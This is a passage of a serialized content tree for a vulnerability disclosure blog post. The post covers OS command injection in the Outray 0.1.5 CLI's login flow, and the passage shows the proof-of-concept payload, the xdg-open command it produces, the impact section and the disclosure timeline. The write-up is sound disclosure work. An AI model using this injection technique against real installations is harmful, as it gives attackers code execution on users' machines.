$(whoami)>/tmp/outray-pwned\"",{"type":19,"tag":118,"props":1248,"children":1249},{"style":204},[1250],{"type":25,"value":695},{"type":19,"tag":118,"props":1252,"children":1253},{"style":131},[1254],{"type":25,"value":709},{"type":19,"tag":118,"props":1256,"children":1258},{"class":120,"line":1257},23,[1259],{"type":19,"tag":118,"props":1260,"children":1261},{"style":131},[1262],{"type":25,"value":897},{"type":19,"tag":67,"props":1264,"children":1265},{},[1266],{"type":25,"value":1267},"Next, point the CLI at the exploit server through OUTRAY_WEB_URL and run the login command. The CLI fetches loginUrl from the attacker-controlled /api/cli/login endpoint and hands it to openBrowser():",{"type":19,"tag":108,"props":1269,"children":1273},{"className":1270,"code":1271,"language":1272,"meta":7,"style":7},"language-bash shiki shiki-themes dracula","export OUTRAY_WEB_URL=\"http://127.0.0.1:3001\"\noutray login\n","bash",[1274],{"type":19,"tag":93,"props":1275,"children":1276},{"__ignoreMap":7},[1277,1307],{"type":19,"tag":118,"props":1278,"children":1279},{"class":120,"line":121},[1280,1285,1290,1294,1298,1303],{"type":19,"tag":118,"props":1281,"children":1282},{"style":137},[1283],{"type":25,"value":1284},"export",{"type":19,"tag":118,"props":1286,"children":1287},{"style":639},[1288],{"type":25,"value":1289}," OUTRAY_WEB_URL",{"type":19,"tag":118,"props":1291,"children":1292},{"style":137},[1293],{"type":25,"value":164},{"type":19,"tag":118,"props":1295,"children":1296},{"style":204},[1297],{"type":25,"value":439},{"type":19,"tag":118,"props":1299,"children":1300},{"style":210},[1301],{"type":25,"value":1302},"http://127.0.0.1:3001",{"type":19,"tag":118,"props":1304,"children":1305},{"style":204},[1306],{"type":25,"value":218},{"type":19,"tag":118,"props":1308,"children":1309},{"class":120,"line":148},[1310,1315],{"type":19,"tag":118,"props":1311,"children":1312},{"style":125},[1313],{"type":25,"value":1314},"outray",{"type":19,"tag":118,"props":1316,"children":1317},{"style":210},[1318],{"type":25,"value":1319}," login\n",{"type":19,"tag":67,"props":1321,"children":1322},{},[1323],{"type":25,"value":1324},"Resulting command after injection 
would be (on linux):",{"type":19,"tag":108,"props":1326,"children":1328},{"className":1270,"code":1327,"language":1272,"meta":7,"style":7},"xdg-open \"https://outray2shell.lol\";echo $(whoami)>/tmp/outray-pwned\"\"\n",[1329],{"type":19,"tag":93,"props":1330,"children":1331},{"__ignoreMap":7},[1332],{"type":19,"tag":118,"props":1333,"children":1334},{"class":120,"line":121},[1335,1340,1344,1348,1352,1357,1362,1367,1372,1377,1382,1387],{"type":19,"tag":118,"props":1336,"children":1337},{"style":125},[1338],{"type":25,"value":1339},"xdg-open",{"type":19,"tag":118,"props":1341,"children":1342},{"style":204},[1343],{"type":25,"value":207},{"type":19,"tag":118,"props":1345,"children":1346},{"style":210},[1347],{"type":25,"value":557},{"type":19,"tag":118,"props":1349,"children":1350},{"style":204},[1351],{"type":25,"value":439},{"type":19,"tag":118,"props":1353,"children":1354},{"style":131},[1355],{"type":25,"value":1356},";",{"type":19,"tag":118,"props":1358,"children":1359},{"style":536},[1360],{"type":25,"value":1361},"echo",{"type":19,"tag":118,"props":1363,"children":1364},{"style":210},[1365],{"type":25,"value":1366}," $(",{"type":19,"tag":118,"props":1368,"children":1369},{"style":125},[1370],{"type":25,"value":1371},"whoami",{"type":19,"tag":118,"props":1373,"children":1374},{"style":210},[1375],{"type":25,"value":1376},")",{"type":19,"tag":118,"props":1378,"children":1379},{"style":137},[1380],{"type":25,"value":1381},">",{"type":19,"tag":118,"props":1383,"children":1384},{"style":210},[1385],{"type":25,"value":1386},"/tmp/outray-pwned",{"type":19,"tag":118,"props":1388,"children":1389},{"style":204},[1390],{"type":25,"value":1391},"\"\"\n",{"type":19,"tag":67,"props":1393,"children":1394},{},[1395,1397,1401,1403,1407],{"type":25,"value":1396},"The output of ",{"type":19,"tag":93,"props":1398,"children":1399},{"className":7},[1400],{"type":25,"value":1371},{"type":25,"value":1402}," is successfully written to 
",{"type":19,"tag":93,"props":1404,"children":1405},{"className":7},[1406],{"type":25,"value":1386},{"type":25,"value":1408},", confirming arbitrary code execution.",{"type":19,"tag":67,"props":1410,"children":1411},{},[1412],{"type":19,"tag":1413,"props":1414,"children":1417},"img",{"alt":1415,"src":1416},"poc-demonstration","/blogs-img/outray-inject.png",[],{"type":19,"tag":20,"props":1419,"children":1421},{"id":1420},"impact",[1422],{"type":25,"value":1423},"Impact",{"type":19,"tag":1425,"props":1426,"children":1427},"ul",{},[1428,1439],{"type":19,"tag":1429,"props":1430,"children":1431},"li",{},[1432,1437],{"type":19,"tag":82,"props":1433,"children":1434},{},[1435],{"type":25,"value":1436},"Remote Code Execution",{"type":25,"value":1438},": Attackers can execute arbitrary commands with the privileges of the user running the CLI. This can lead to full system compromise, data exfiltration, or installation of persistence.",{"type":19,"tag":1429,"props":1440,"children":1441},{},[1442,1447],{"type":19,"tag":82,"props":1443,"children":1444},{},[1445],{"type":25,"value":1446},"Supply Chain Attack",{"type":25,"value":1448},": If this CLI is used in CI/CD pipelines or automated scripts where environment variables might be manipulated, it could serve as an entry point for supply chain attacks.",{"type":19,"tag":48,"props":1450,"children":1452},{"id":1451},"timeline",[1453],{"type":25,"value":1454},"Timeline",{"type":19,"tag":1425,"props":1456,"children":1457},{},[1458,1468,1478,1487],{"type":19,"tag":1429,"props":1459,"children":1460},{},[1461,1466],{"type":19,"tag":82,"props":1462,"children":1463},{},[1464],{"type":25,"value":1465},"12/1/2026",{"type":25,"value":1467}," - Submitted to maintainer via GitHub advisory",{"type":19,"tag":1429,"props":1469,"children":1470},{},[1471,1476],{"type":19,"tag":82,"props":1472,"children":1473},{},[1474],{"type":25,"value":1475},"14/1/2026",{"type":25,"value":1477}," - Maintainer closed 
advisory",{"type":19,"tag":1429,"props":1479,"children":1480},{},[1481,1485],{"type":19,"tag":82,"props":1482,"children":1483},{},[1484],{"type":25,"value":1475},{"type":25,"value":1486}," - Submitted to VulDB for review",{"type":19,"tag":1429,"props":1488,"children":1489},{},[1490,1495],{"type":19,"tag":82,"props":1491,"children":1492},{},[1493],{"type":25,"value":1494},"17/1/2026",{"type":25,"value":1496}," - Submission Rejected, suggested submission to Mitre",{"type":19,"tag":1498,"props":1499,"children":1500},"style",{},[1501],{"type":25,"value":1502},"html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":148,"depth":148,"links":1504},[1505,1512],{"id":22,"depth":148,"text":8,"children":1506},[1507,1509,1510,1511],{"id":50,"depth":172,"text":1508},"Source code: (github link)",{"id":62,"depth":172,"text":65},{"id":74,"depth":172,"text":77},{"id":494,"depth":172,"text":497},{"id":1420,"depth":148,"text":1423,"children":1513},[1514],{"id":1451,"depth":172,"text":1454},"markdown","content:blogs:Outray_0.1.5_os_command_injection.md","content","blogs/Outray_0.1.5_os_command_injection.md","md",{"loc":4,"lastmod":1521,"images":1522},"2026-04-29T18:26:59.364Z",[],1777487261905]